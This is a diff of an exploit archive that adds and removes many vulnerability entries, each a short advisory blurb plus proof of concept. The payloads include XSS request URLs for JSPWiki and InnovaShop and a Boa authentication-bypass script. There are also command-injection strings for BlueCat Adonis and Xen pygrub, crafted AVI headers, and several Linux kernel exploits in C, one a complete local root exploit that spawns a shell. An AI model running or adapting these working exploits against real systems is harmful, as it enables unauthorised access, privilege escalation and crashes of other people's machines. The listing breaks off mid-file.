Versions prior to JSPWiki 2.5.138-beta are vulnerable.
http://www.example.com/wiki/NewGroup.jsp?group=[XSS]

9
platforms/jsp/webapps/30609.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25803/info
JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input.
Attacker-supplied HTML and script code will run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
Versions prior to JSPWiki 2.5.138-beta are vulnerable.
http://www.example.com/wiki/Edit.jsp?page=Main&action=save&edittime=1186698299838&addr=127.0.0.1&_editedtext=[XSS]&changenote=[XSS]&ok=Save

9
platforms/jsp/webapps/30610.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25803/info
JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input.
Attacker-supplied HTML and script code will run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
Versions prior to JSPWiki 2.5.138-beta are vulnerable.
http://www.example.com/wiki/Comment.jsp?page=Main&action=save&edittime=1186698386737&addr=127.0.0.1&_editedtext=[XSS]&author=AnonymousCoward&link=&ok=Save

9
platforms/jsp/webapps/30611.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25803/info
JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input.
Attacker-supplied HTML and script code will run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
Versions prior to JSPWiki 2.5.138-beta are vulnerable.
http://www.example.com/wiki/UserPreferences.jsp?tab=profile&loginname=[XSS]&password=test&password2=test&wikiname=[XSS]&fullname=[XSS]&email=[XSS]&ok=Save+profile&action=saveProfile

9
platforms/jsp/webapps/30612.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25803/info
JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input.
Attacker-supplied HTML and script code will run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
Versions prior to JSPWiki 2.5.138-beta are vulnerable.
http://www.example.com/wiki/Login.jsp?tab=profile&loginname=[XSS]&password=Test&password2=Test&wikiname=[XSS]&fullname=[XSS]&email=[XSS]&ok=Save+profile&action=saveProfile

9
platforms/jsp/webapps/30613.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25803/info
JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input.
Attacker-supplied HTML and script code will run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
Versions prior to JSPWiki 2.5.138-beta are vulnerable.
http://www.example.com/wiki/Diff.jsp?page=Administrator&r1=[XSS]&r2=[XSS]

7
platforms/jsp/webapps/30675.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/26084/info
InnovaShop is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/path/tc/contents/home001.jsp?contentid=[XSS]

7
platforms/jsp/webapps/30676.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/26084/info
InnovaShop is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/path/msg.jsp?msg=[XSS]

209
platforms/linux/dos/29711.txt
View file

@ -1,209 +0,0 @@
+--------------------------------------------------------------------+
| XADV-2013007 Linux Kernel bt8xx Video Driver IOCTL Heap Overflow |
+--------------------------------------------------------------------+
Vulnerable versions:
- linux kernel 2.6.18 <=
Testbed: ubuntu
Type: Local
Impact: Medium
Vendor: http://www.kernel.org
Author: x90c <geinblues *nospam* gmail dot com>
Site: x90c.org
=========
ABSTRACT:
=========
The bt8xx video driver is a video capture driver. It supports Bt848
Bt849, Bt878, and Bt879.
The bt8xx video driver in the linux kernel has a vulnerability to
occur Integer overflow to the kernel panic. It's at do ioctl code for
bt8xx and copy_from_user() larger user-supplied data to the kernel
heap buffer than kmalloc'd kmem.
I discovered it again.
=========
DETAILS:
=========
(1) v4l2_clip struct.
[~linux-2.6.18/include/linux/videodev2.h]
----
struct v4l2_clip
{
struct v4l2_rect c;
struct v4l2_clip __user *next;
};
----
[~linux/2.6.18/include/linux/videodev.h]
----
struct video_window
{
__u32 x,y; /* Position of window */
__u32 width,height; /* Its size */
__u32 chromakey;
__u32 flags;
struct video_clip __user *clips; /* Set only */
int clipcount;
#define VIDEO_WINDOW_INTERLACE 1
#define VIDEO_WINDOW_CHROMAKEY 16 /* Overlay by chromakey */
#define VIDEO_CLIP_BITMAP -1
/* bitmap is 1024x625, a '1' bit represents a clipped pixel */
#define VIDEO_CLIPMAP_SIZE (128 * 625)
};
----
*clips member varaible of video_window is a pointer.
(2) Do exploit: bttv IOCTL!
[~/linux-2.6.18/drivers/media/video/bt8xx/bttv-driver.c]
----
static int bttv_do_ioctl(struct inode *inode, struct file *file,
unsigned int cmd, void *arg)
{
case VIDIOCSWIN:
{
struct video_window *win = arg; // XXX win = arg.
struct v4l2_window w2;
if (no_overlay > 0) {
printk ("VIDIOCSWIN: no_overlay\n");
return -EINVAL;
}
w2.field = V4L2_FIELD_ANY;
w2.w.left = win->x;
w2.w.top = win->y;
w2.w.width = win->width;
w2.w.height = win->height;
w2.clipcount = win->clipcount; // clipcount! (copy size / 8)
w2.clips = (struct v4l2_clip __user *)win->clips; // clips! (to copy src)
retval = setup_window(fh, btv, &w2, 0); // XXX vulnerable setup_window() called!
----
The ioctl argument to win struct pointer and store the win->clipcount and
win->clips to w2 struct for each. and called vulnerable setup_window().
(3) Result: kernel heap overflow occured.
[~/linux-2.6.18/drivers/media/video/bt8xx/bttv-driver.c]
----
static int setup_window(struct bttv_fh *fh, struct bttv *btv,
struct v4l2_window *win, int fixup)
{
struct v4l2_clip *clips = NULL;
int n,size,retval = 0; // XXX n, size are signed.
if (NULL == fh->ovfmt)
return -EINVAL;
if (!(fh->ovfmt->flags & FORMAT_FLAGS_PACKED))
return -EINVAL;
/* XXX no win.clipcount/clips validation. */
retval = verify_window(&bttv_tvnorms[btv->tvnorm],win,fixup);
if (0 != retval)
return retval;
/* copy clips -- luckily v4l1 + v4l2 are binary
compatible here ...*/
/*
* XXX win(ioctl arg)->clipcount as a negative value, -3.
* n and ->clipcount both signed integer.
*/
n = win->clipcount;
// (2) XXX *clips size kmalloc'd!
size = sizeof(*clips)*(n+4); // If n == -3? (-3+4)=1.
clips = kmalloc(size,GFP_KERNEL);
if (NULL == clips)
return -ENOMEM;
/*
* copy size is -(v4l2_clip struct size * n) to occur Integer overflow,
* to be larger value to a little clips buffer. Kernel Panic!
*/
if (n > 0) {
if (copy_from_user(clips,win->clips, sizeof(struct v4l2_clip)*n)) {
kfree(clips);
return -EFAULT;
}
}
----
===============
EXPLOIT CODES:
===============
/*
* bt8xx linux kernel driver bug PoC code
*
* - Advisory: http://www.x90c.org/advisories/xadv_2013007_linux_kernel.txt
*
* -x90c
*/
#include<stdio.h>
#include<stdlib.h>
#include<sys/ioctl.h>
#include<linux/videodev.h>
int main(){
struct video_window vw;
int fd = 0;
/*
* [root@centos5]# ls -al /dev/video0
* crw-rw-rw- 1 root root 81, 0 11 19 06:51 /dev/video0
* [root@centos5]#
*
* (Refer to ~linux-2.6.18/Documentation/video4linux/bttv/MAKEDEV).
*/
if((fd = open("/dev/video0", O_RDWR)) < 0){
fprintf(stderr, "device not connected...\n");
exit(-1);
}
vw.clipcount = -3;
if(ioctl(fd, VIDIOCSWIN, &vw) < 0){
fprintf(stderr, "ioctl failed\n");
exit(-2);
}
printf("bt8xx kernel driver bug.. kernel panic!");
}
=============
PATCH CODES:
=============
-
===============
VENDOR STATUS:
===============
2013/11/18 - I discovered the security bug.
2013/11/18 - The advisory released on full-disclosure, bugtraq.
2013/11/19 - An PoC code for the bug submitted to the exploit-db.
============
DISCLAIMER:
============
The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in this
document. Liability claims regarding damage caused by the use of any information
provided, including any kind of information which is incomplete or incorrect,
will therefore be rejected.

12
platforms/linux/dos/30444.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/25170/info
KDE Konqueror is prone to a remote denial-of-service vulnerability because it fails to handle improperly formated HTML code.
An attacker may exploit this vulnerability to cause Konqueror to crash, resulting in denial-of-service conditions.
Konqueror 3.5.7 and prior versions are reported vulnerable.
<textarea></button>&lt;/textarea&gt;</br><bdo dir="">
<pre><frameset>
<a>

56
platforms/linux/dos/30542.txt Executable file
View file

@ -0,0 +1,56 @@
source: http://www.securityfocus.com/bid/25481/info
EnterpriseDB Advanced Server is prone to an uninitialized-pointer vulnerability.
Authenticated attackers can exploit this issue to cause denial-of-service conditions. Given the nature of this vulnerability, remote code execution may also be possible, but this has not been confirmed.
EnterpriseDB Advanced Server 8.2 is vulnerable; other versions may also be affected.
1) Connect to one vulnerable EnterpriseDB as a low level user (the
execution privilege over the pldbg_* function is granted by default).
2) Execute the following query:
edb=> select pldbg_abort_target(1094861636); -- 0x41424344 in decimal
(gdb) where
#0 0x00ba81db in sendBytes ()
from /opt/EnterpriseDB/8.2/dbserver/lib/pldbgapi.so
#1 0x00ba82a1 in sendUInt32 ()
from /opt/EnterpriseDB/8.2/dbserver/lib/pldbgapi.so
#2 0x00ba82e3 in sendString ()
from /opt/EnterpriseDB/8.2/dbserver/lib/pldbgapi.so
#3 0x00ba8880 in pldbg_abort_target ()
from /opt/EnterpriseDB/8.2/dbserver/lib/pldbgapi.so
#4 0x0816669d in ExecMakeFunctionResult ()
#5 0x08168d51 in ExecProject ()
#6 0x0817544d in ExecResult ()
#7 0x08162f65 in ExecProcNode ()
#8 0x08161931 in ExecutorRun ()
#9 0x081fa2e3 in PortalRunSelect ()
#10 0x081fb12a in PortalRun ()
#11 0x081f5a8b in exec_simple_query ()
#12 0x081f76ec in PostgresMain ()
#13 0x081ca356 in ServerLoop ()
#14 0x081cb2b7 in PostmasterMain ()
#15 0x081865d7 in main ()
(gdb) x /i $pc
0xba81db <sendBytes+11>: mov (%eax),%eax
(gdb) i r
eax 0x41424344 1094861636
ecx 0x4 4
edx 0xbff46c04 -1074500604
ebx 0xbacbd8 12241880
esp 0xbff46bc0 0xbff46bc0
ebp 0xbff46be8 0xbff46be8
esi 0x4 4
edi 0xbab597 12236183
eip 0xba81db 0xba81db
eflags 0x10286 66182
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
The complete database server (droping all active conections) crashes.

18
platforms/linux/dos/30578.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/25648/info
MPlayer is prone to a heap-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input data.
Attackers can exploit this issue to execute arbitrary code with the privileges of the user running the application. Failed attacks will result in denial-of-service conditions.
MPlayer 1.0rc1 is vulnerable; other versions may also be affected.
NOTE: The vendor states that this issue is present only on operating systems with a 'calloc' implementation that is prone to an integer-overflow issue.
The following proof-of-concept AVI header data is available:
69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10
indx truck size 0xffffff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020

32
platforms/linux/dos/30579.txt Executable file
View file

@ -0,0 +1,32 @@
source: http://www.securityfocus.com/bid/25650/info
Media Player Classic (MPC) is prone to multiple remote vulnerabilities, including a heap-based buffer-overflow issue and an integer-overflow issue, when handling malformed AVI files.
An attacker can exploit these issues to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.
Media Player Classic 6.4.9.0 is vulnerable; other versions may also be affected.
The following examples of AVI header data are available:
69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10
indx truck size 0xffffffff
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF
indx truck size 0xffffff00
wLongsPerEntry 0xffff
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0xFFFFFFFF
69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10
indx truck size 0xffffff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020

37
platforms/linux/dos/30580.txt Executable file
View file

@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/25651/info
KMPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed AVI media files.
Successfully exploiting this issue allows remote attackers to deny service to legitimate users.
These issues affect KMPlayer 2.9.3.1210; other versions may also be vulnerable.
new_avihead_poc1.avi
------------------------------------------
69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10
indx truck size 0xffffffff
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
new_avihead_poc2.avi
------------------------------------------
69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF
indx truck size 0xffffff00
wLongsPerEntry 0xffff
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0xFFFFFFFF
new_avihead_poc3.avi
------------------------------------------
69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10
indx truck size 0xffffff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020

24
platforms/linux/dos/30584.py Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/25676/info
Boa is prone to an authentication-bypass vulnerability because the application fails to ensure that passwords are not overwritten by specially crafted HTTP Requests.
An attacker can exploit this issue to gain unauthorized access to the affected application. This may lead to other attacks.
This issue affects Boa 0.93.15; other versions may also be affected.
NOTE: This issue affects only Boa with Intersil Extensions installed.
#!/usr/bin/env python
import urllib2
SERVER_IP_ADDRESS = '192.168.0.1'
USERNAME =
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
NEW_PASSWORD = 'owned'
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password('LOGIN(default username & password is admin)',
SERVER_IP_ADDRESS, USERNAME, NEW_PASSWORD);
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
res = urllib2.urlopen('http://'+SERVER_IP_ADDRESS+'/home/index.shtml')

21
platforms/linux/dos/30646.txt Executable file
View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/25952/info
Nagios Plugins are prone to a remote buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer.
Exploiting this issue allows attackers to execute arbitrary machine code in the context of users running the affected software.
This issue affects Nagios Plugins 1.4.9; other versions may also be vulnerable.
Location: htttttttttttttttttttttttttttttttttttttttttttp://example.com/
Location: http://example.com:1234567890123456789012345678901234567890/
Location:
http://tooooooooooooooooooooooooooooooooooooooooooooooooooo.loooooooooooooo
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.looooooooo
ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.loooo
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.
loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
oong.looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
ooooooong.loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
oooooooooooong.host-name.example.com/

9
platforms/linux/dos/30648.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25969/info
AlsaPlayer is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer.
Exploiting this issue allows attackers to execute arbitrary machine code in the context of users running the affected application.
This issue affects versions prior to AlsaPlayer 0.99.80-rc3.
http://www.exploit-db.com/sploits/30648.ogg

13
platforms/linux/local/27425.txt
View file

@ -1,13 +0,0 @@
source: http://www.securityfocus.com/bid/17126/info
Zoo is prone to a local buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.
An attacker can exploit this issue to execute arbitrary code in the context of the victim user running the affected application to potentially gain elevated privileges.
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
touch feh
cd ../..
zoo a arch.zoo `perl -e 'print "A"x254 . "/" . "A"x254 . "/feh"'`

20
platforms/linux/local/30464.c Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/25251/info
GSWKT (Generic Software Wrappers Toolkit) is prone to multiple concurrency vulnerabilities because of its implementation of system call wrappers. This problem can result in a race condition between a user thread and the kernel.
Attackers can exploit these issues by replacing certain values in system call wrappers with malicious data to elevate privileges or to bypass auditing. Successful attacks can completely compromise affected computers.
GSWKT 1.6.3 is vulnerable; other versions may also be affected.
#define EVIL_NAME ./home/ko/.forward.
#define REAL_NAME ./home/ko/Inbox.
volatile char *path;
/* Set up path string so nul is on different page. */
path = fork_malloc_lastbyte(sizeof(EVIL_NAME));
strcpy(path, EVIL_NAME);
/* Page out the nul so reading it causes a fault. */
pageout_lastbyte(path, sizeof(EVIL_NAME));
/* Create a child to overwrite path on next fault. */
pid = fork_and_overwrite_up(path, REAL_NAME,
sizeof(REAL_NAME));
fd = open(path, O_RDRW);

9
platforms/linux/local/30503.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25342/info
BlueCat Networks Adonis devices are prone to a remote privilege-escalation vulnerability because the software fails to properly sanitize user-supplied input.
An attacker with administrative privileges can exploit this issue to execute arbitrary shell commands with superuser privileges. A successful attack will result in the complete compromise of an affected appliance.
Adonis 5.0.2.8 is vulnerable; other versions may also be affected.
set host-name ;bash

145
platforms/linux/local/30604.c Executable file
View file

@ -0,0 +1,145 @@
source: http://www.securityfocus.com/bid/25774/info
The Linux kernel is prone to a local privilege-escalation vulnerability.
Exploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers.
Versions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue.
/*
* exploit for x86_64 linux kernel ia32syscall emulation
* bug, discovered by Wojciech Purczynski <cliph_at_isec.pl>
*
* by
* Robert Swiecki <robert_at_swiecki.net>
* Przemyslaw Frasunek <venglin_at_freebsd.lublin.pl>
* Pawel Pisarczyk <pawel_at_immos.com.pl>
* of ATM-Lab http://www.atm-lab.pl
*/
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <inttypes.h>
#include <sys/reg.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
uint32_t uid, euid, suid;
static void kernelmodecode(void)
{
int i;
uint8_t *gs;
uint32_t *ptr;
asm volatile ("movq %%gs:(0x0), %0" : "=r"(gs));
for (i = 200; i < 1000; i+=1) {
ptr = (uint32_t*) (gs + i);
if ((ptr[0] == uid) && (ptr[1] == euid)
&& (ptr[2] == suid) && (ptr[3] == uid)) {
ptr[0] = 0; //UID
ptr[1] = 0; //EUID
ptr[2] = 0; //SUID
break;
}
}
}
static void docall(uint64_t *ptr, uint64_t size)
{
getresuid(&uid, &euid, &suid);
uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);
if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
printf("mmap fault\n");
exit(1);
}
for (; ptr < (tmp + size); ptr++)
*ptr = (uint64_t)kernelmodecode;
__asm__("\n"
"\tmovq $0x101, %rax\n"
"\tint $0x80\n");
printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid());
execl("/bin/sh", "bin/sh", 0);
printf("no /bin/sh ??\n");
exit(0);
}
int main(int argc, char **argv)
{
int pid, status, set = 0;
uint64_t rax;
uint64_t kern_s = 0xffffffff80000000;
uint64_t kern_e = 0xffffffff84000000;
uint64_t off = 0x0000000800000101 * 8;
if (argc == 4) {
docall((uint64_t*)(kern_s + off), kern_e - kern_s);
exit(0);
}
if ((pid = fork()) == 0) {
ptrace(PTRACE_TRACEME, 0, 0, 0);
execl(argv[0], argv[0], "2", "3", "4", 0);
perror("exec fault");
exit(1);
}
if (pid == -1) {
printf("fork fault\n");
exit(1);
}
for (;;) {
if (wait(&status) != pid)
continue;
if (WIFEXITED(status)) {
printf("Process finished\n");
break;
}
if (!WIFSTOPPED(status))
continue;
if (WSTOPSIG(status) != SIGTRAP) {
printf("Process received signal: %d\n", WSTOPSIG(status));
break;
}
rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
if (rax == 0x000000000101) {
if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
printf("PTRACE_POKEUSER fault\n");
exit(1);
}
set = 1;
}
if ((rax == 11) && set) {
ptrace(PTRACE_DETACH, pid, 0, 0);
for(;;)
sleep(10000);
}
if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
printf("PTRACE_SYSCALL fault\n");
exit(1);
}
}
return 0;
}

66
platforms/linux/local/30605.c Executable file
View file

@ -0,0 +1,66 @@
source: http://www.securityfocus.com/bid/25774/info
The Linux kernel is prone to a local privilege-escalation vulnerability.
Exploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers.
Versions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue.
/*
*****************************************************************************************
* by Karimo_DM under GPL *
* *
* Linux Kernel ALSA snd-page-alloc Local Proc File Information Disclosure Vulnerability *
* CVE-2007-4571 *
* *
* This simple PoF demonstrate how snd_page_alloc.c prior to Linux Kernel version *
* 2.6.22.8 (2.6.23-rc8) fails to boundary check a buffer in case of count=1 showing *
* parts of kernel memory (reaveling randomly some risky informations). *
* *
* karimo@localhost:~/src/c/bugs$ gcc -O2 cve20074571_alsa.c -ocve20074571_alsa *
* karimo@localhost:~/src/c/bugs$ ./cve20074571_alsa | hexdump -C *
* 00000000 00 03 55 55 27 00 00 00 10 50 12 08 1e 50 12 08 |..UU'....P...P..| *
* 00000010 4f 53 46 30 30 30 31 30 30 32 30 2f 2f 00 41 4e |OSF00010020//.AN| *
* 00000020 53 49 5f 58 33 2e 34 2d 31 39 00 03 55 55 27 00 |SI_X3.4-19..UU'.| *
* 00000030 00 00 10 50 12 08 1e 50 12 08 4f 53 46 30 30 30 |...P...P..OSF000| *
* 00000040 31 30 30 32 30 2f 2f 00 41 4e 53 49 5f 58 33 2e |10020//.ANSI_X3.| *
* 00000050 34 2d 31 39 00 03 55 55 27 00 00 00 10 50 12 08 |4-19..UU'....P..| *
* 00000060 1e 50 12 08 4f 53 46 30 30 30 31 30 30 32 30 2f |.P..OSF00010020/| *
* 00000070 2f 00 41 4e 53 49 5f 58 33 2e 34 2d 31 39 00 03 |/.ANSI_X3.4-19..| *
* 00000080 55 55 27 00 00 00 10 50 12 08 1e 50 12 08 4f 53 |UU'....P...P..OS| *
* 00000090 46 30 30 30 31 30 30 32 30 2f 2f 00 41 4e 53 49 |F00010020//.ANSI| *
* ... *
* 000051d0 00 02 20 00 78 ce ed da c0 43 93 c4 01 80 00 4d |.. .xÎíÚÀC.Ä...M| *
* 000051e0 71 88 9d 3c 04 27 0d 5d 80 ec 19 2f 12 8a 42 9d |q..<.'.].ì./..B.| *
* 000051f0 80 2e 9f c7 89 2c 87 ca 97 dd 50 8a e3 fa c3 15 |...Ç.,.Ê.ÝP.ãúÃ.| *
* 00005200 a2 3e 37 49 93 c4 01 80 00 4d 71 88 9d 3c 04 27 |¢>7I.Ä...Mq..<.'| *
* 00005210 0d 5d 80 ec 19 2f 12 8a 42 9d 80 2e 9f c7 89 2c |.].ì./..B....Ç.,| *
* 00005220 87 ca 97 dd 50 8a e3 fa c3 15 a2 3e 37 49 93 c4 |.Ê.ÝP.ãúÃ.¢>7I.Ä| *
* ... *
* *
* *
* [ Tested on a Slackware 12.0 running a self-compiled 2.6.21.3 Linux Kernel ] *
*****************************************************************************************
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#define _SOME_NUM 0xffff
int main() {
unsigned int j;
char kern_mem[2];
int fd=open("/proc/driver/snd-page-alloc",O_RDONLY);
for (j=0;j<(unsigned int)_SOME_NUM;j++) {
memset(kern_mem,0,2);
/* That 1 really do the job ;P */
if (!read(fd,kern_mem,1)) {
close(fd);
fd=open("/proc/driver/snd-page-alloc",O_RDONLY);
} else printf("%c",kern_mem[0]);
}
}

12
platforms/linux/local/30620.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/25825/info
Xen is prone to a local command-injection vulnerability that can lead to privilege escalation.
This issue occurs because the application fails to validate input in the 'tools/pygrub/src/GrubConf.py' script.
This vulnerability affects Xen 3.0.3; other versions may be affected as well.
An attacker can exploit this issue by including Python commands in a configuration file using filesystem utilities. The following proof of concept is available:
Change the 'default' statement in grub.conf to:
default "+str(0*os.system(" insert evil command here "))+"

139
platforms/linux/remote/30284.vbs
View file

@ -1,139 +0,0 @@
source: http://www.securityfocus.com/bid/24832/info
Sun Java Runtime Environment is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely result in a denial-of-service condition.
This issue affects these versions:
Java Runtime Environment 6 update 1
Java Runtime Environment 5 update 11
Prior versions are also affected.
'-----------------------------------------------------------------------------------------------
' Java Web Start Buffer Overflow POC Exploit
'
' FileName: JavaWebStartPOC.VBS
' Contact: ZhenHan.Liu#ph4nt0m.org
' Date: 2007-07-10
' Team: http://www.ph4nt0m.org
' Enviroment: Tested on JRE 1.6, javaws.exe v6.0.10.6
' Reference: http://seclists.org/fulldisclosure/2007/Jul/0155.html
' Usage: I did not put a real alpha shellcode here, you'd replace it with your own.
'
' Code(javaws.exe):
' .text:00406208 ; *************** S U B R O U T I N E ***************************************
' .text:00406208
' .text:00406208 ; Attributes: bp-based frame
' .text:00406208
' .text:00406208 sub_406208 proc near ; CODE XREF: sub_405468+4E p
' .text:00406208
' .text:00406208 FileName = byte ptr -540h
' .text:00406208 FindFileData = _WIN32_FIND_DATAA ptr -140h
' .text:00406208 arg_0 = dword ptr 8
' .text:00406208 arg_4 = dword ptr 0Ch
' .text:00406208
' .text:00406208 push ebp ; FileName 1k Buffer
' .text:00406209 mov ebp, esp
' .text:0040620B sub esp, 540h
' .text:00406211 push 5Fh
' .text:00406213 push 2Fh
' .text:00406215 push [ebp+arg_0]
' .text:00406218 call sub_40544D
' .text:00406218
' .text:0040621D push 5Fh
' .text:0040621F push 3Ah
' .text:00406221 push [ebp+arg_0]
' .text:00406224 call sub_40544D
' .text:00406224
' .text:00406229 add esp, 18h
' .text:0040622C push 2Ah
' .text:0040622E push [ebp+arg_0] ; codebase buffer
' .text:00406231 push 5Ch
' .text:00406233 push offset s_Si ; "si"
' .text:00406238 push 5Ch
' .text:0040623A push offset s_Tmp_0 ; "tmp"
' .text:0040623F push 5Ch
' .text:00406241 call sub_40615B
' .text:00406241
' .text:00406246 push eax
' .text:00406247 lea eax, [ebp+FileName]
' .text:0040624D push offset s_SCSCSCSC ; "%s%c%s%c%s%c%s%c"
' .text:00406252 push eax ; char *
' .text:00406253 call _sprintf ; sprintf copy codebase to 1k stack buffer lead to buffer over flow
' .text:00406253
' .text:00406258 add esp, 28h
' .text:0040625B lea eax, [ebp+FindFileData]
' .text:00406261 push eax ; lpFindFileData
' .text:00406262 lea eax, [ebp+FileName]
' .text:00406268 push eax ; lpFileName
' .text:00406269 call ds:FindFirstFileA
' .text:0040626F cmp eax, 0FFFFFFFFh
' .text:00406272 jnz short loc_406278
' .text:00406272
' .text:00406274 xor eax, eax
' .text:00406276 leave
' .text:00406277 retn
' .text:00406277
' .text:00406278 ; ---------------------------------------------------------------------------
' .text:00406278
' .text:00406278 loc_406278: ; CODE XREF: sub_406208+6A j
' .text:00406278 push esi
' .text:00406279 mov esi, [ebp+arg_4]
' .text:0040627C lea ecx, [ebp+FindFileData' .cFileName]
' .text:00406282 mov edx, ecx
' .text:00406284 sub esi, edx
' .text:00406284
' .text:00406286
' .text:00406286 loc_406286: ; CODE XREF: sub_406208+86 j
' .text:00406286 mov dl, [ecx]
' .text:00406288 mov [esi+ecx], dl
' .text:0040628B inc ecx
' .text:0040628C test dl, dl
' .text:0040628E jnz short loc_406286
' .text:0040628E
' .text:00406290 push eax ; hFindFile
' .text:00406291 call ds:FindClose
' .text:00406297 xor eax, eax
' .text:00406299 inc eax
' .text:0040629A pop esi
' .text:0040629B leave
